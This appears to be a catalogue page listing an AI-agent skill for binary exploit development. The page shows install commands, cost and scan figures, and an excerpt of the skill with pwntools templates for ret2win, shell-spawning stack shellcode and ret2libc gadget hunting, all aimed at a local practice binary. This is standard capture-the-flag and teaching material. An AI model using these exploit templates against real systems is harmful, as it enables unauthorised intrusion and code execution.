Getting it into your agent
One page per mod, every tool's command on it. A separate URL per tool would split the same page into five that compete with each other.
npx agentmods add skills/allsmog/pwn-claude-plugin/exploit-developmentnpx skills add allsmog/pwn-claude-plugin --skill exploit-developmentgit clone --depth 1 https://github.com/allsmog/pwn-claude-pluginWrote this? Show the measurements
A badge with what this costs and how it scanned, read live from this page, so it follows the numbers instead of freezing them. Markdown for a README, HTML for a documentation site or a project page.
[](https://agentmods.dev/skills/allsmog/pwn-claude-plugin/exploit-development)<a href="https://agentmods.dev/skills/allsmog/pwn-claude-plugin/exploit-development"><img src="https://agentmods.dev/badge/skills/allsmog/pwn-claude-plugin/exploit-development.svg" alt="Measured on agentmods" height="20"></a>What it costs to keep this loaded
Counted locally with the o200k_base tokenizer, which is exact for GPT models; Claude uses its own tokenizer and its counts differ. Treat this as one consistent yardstick across the catalogue rather than a bill. Prices are per million input tokens.
| Model | Per session | Once invoked |
|---|---|---|
| Fable 5 | $0.00073 | $0.02050 |
| Opus 5 | $0.00036 | $0.01025 |
| Sonnet 5 | $0.00015 | $0.00410 |
| Haiku 4.5 | $0.00007 | $0.00205 |
Grade A, and why
PWN Exploit Development scanned grade A with 0 findings against 26 rules in 11 categories — prompt injection, anti-refusal, data exfiltration, privilege escalation, supply chain, agent snooping, system-prompt leakage, SSRF and excessive agency — measured 3d ago.
A static scan of the body, not an audit. Every finding is printed with the line that produced it so you can judge whether it matters here. A mod is markdown that instructs an agent; that is exactly why what it instructs is worth reading.
Nothing flagged
None of the 26 patterns this scan looks for appear in this file: no shell pipes, no recursive deletes, no credential paths, no hidden text, no instruction-override or anti-refusal phrasing, no agent-config snooping. That is not a guarantee, it is the absence of the things that are checkable.
How it starts
The opening of the file, as written. The whole thing — 311 lines — stays where its author put it; the contents beside it link to each section on GitHub.
PWN Exploit Development
Overview
Exploit development transforms vulnerability findings into working payloads. This skill provides protection-aware technique selection and payload construction guidance for common exploitation scenarios.
Technique Selection Matrix
Choose technique based on protections:
| Scenario | Protections | Technique |
|---|---|---|
| ret2win | No PIE, No canary, NX | Direct address overwrite |
| Shellcode | No NX, No PIE | Stack shellcode injection |
| ret2libc | NX, No PIE | Return to system/execve |
| ROP | NX, Partial RELRO | ROP chain execution |
| Leak + ret2libc | NX, PIE | Leak base, then ret2libc |
| Canary bypass | Stack canary | Leak canary first |
| Full RELRO | Full RELRO | __malloc_hook, stack pivot |
Technique 1: ret2win
When: Win function exists, no PIE, no canary
from pwn import *
elf = ELF('./binary')
io = process('./binary')
# Payload: padding + win address
payload = b'A' * offset
payload += p64(elf.symbols['win'])
io.sendline(payload)
io.interactive()
Stack alignment (x64): If segfault on movaps, add a ret gadget:
ret = elf.search(asm('ret')).__next__()
payload = b'A' * offset
payload += p64(ret) # Stack alignment
payload += p64(elf.symbols['win'])
Technique 2: Shellcode Injection
When: NX disabled, executable stack
from pwn import *
context.arch = 'amd64'
elf = ELF('./binary')
io = process('./binary')
# Generate shellcode
shellcode = asm(shellcraft.sh())
# Find buffer address (may need leak or fixed)
buf_addr = 0x7fffffffe000 # Example - find via debugging
# Payload: shellcode + padding + return to buffer
payload = shellcode
payload += b'A' * (offset - len(shellcode))
payload += p64(buf_addr)
io.sendline(payload)
io.interactive()
Technique 3: ret2libc
When: NX enabled, libc available
Step 1: Find Gadgets
ROPgadget --binary ./binary | grep "pop rdi"
# Output: 0x0000000000401234 : pop rdi ; ret
What ships with it
4 files beside SKILL.md in the same directory: the scripts, references and assets a skill reads on demand. Not counted in the per-session cost; read them before you install if any of them is executable.
What this file has done since we first saw it
Hashed on every crawl. A supply-chain change to an agent config is a question of when, not whether, so the history is kept rather than the latest state alone.
- 3d ago First seen · 311 lines · 73 tokens per session scan A 98a916b41280
PWN Exploit Development is a skill published in the GitHub repository allsmog/pwn-claude-plugin (2 stars, last pushed 6mo ago), licensed MIT. It adds 73 tokens to every session and 2,050 once invoked, about $0.0004 per session on Opus 5. A static security scan graded it A with 0 findings. No closer match exists in the catalogue, so it is treated as the original; first seen 2026-08-31.
Other skills, from other repositories
bypassing-binary-exploitation-mitigations
Methodology for identifying and defeating common binary hardening mitigations during authorized exploitation — ASLR, PIE, stack canaries, NX/DEP, and RELRO — by leaking addresses, brute-forcing entropy, abusing forked-process behavior, and selecting the right code-reuse primitive for the protections in place.
exploiting-arbitrary-write-to-execution
Methodology for converting an arbitrary-write (write-what-where) or write-anything-anywhere primitive into code execution during authorized engagements, covering target selection among GOT/PLT entries, .finiarray/.dtors, mallochook/freehook, the atexit/exitfuncs handler list, and printfarginfotable, plus how…
exploiting-format-string-vulnerabilities
Methodology for exploiting format string bugs where attacker-controlled data reaches the format argument of printf-family functions, enabling stack/memory disclosure (info leaks for ASLR/PIE/canary defeat) and arbitrary write primitives (%n) to hijack control flow via GOT/.finiarray overwrites.
exploiting-glibc-heap-vulnerabilities
Methodology for exploiting glibc ptmalloc2 heap vulnerabilities during authorized engagements — use-after-free, double-free, heap overflow, and bin-based attacks (tcache poisoning, fast-bin dup, unsorted/large-bin) — including modern mitigations (tcache key, safe-linking, hook removal) and how to obtain leaks and…
exploiting-integer-overflow-vulnerabilities
Methodology for finding and exploiting integer overflow, underflow, truncation, and signedness bugs in native code during authorized engagements, focusing on how wrapped arithmetic in size/length calculations leads to undersized allocations, oversized copies, length-check bypasses, and downstream heap/stack overflows.
exploiting-linux-kernel-vulnerabilities
Methodology for discovering and exploiting Linux kernel memory-corruption vulnerabilities (UAF, OOB read/write, race/TOCTOU, type confusion) during authorized engagements, covering reachability analysis, building stable read/write primitives from a single bug, defeating KASLR/SMEP/SMAP/KPTI, slab/buddy heap grooming…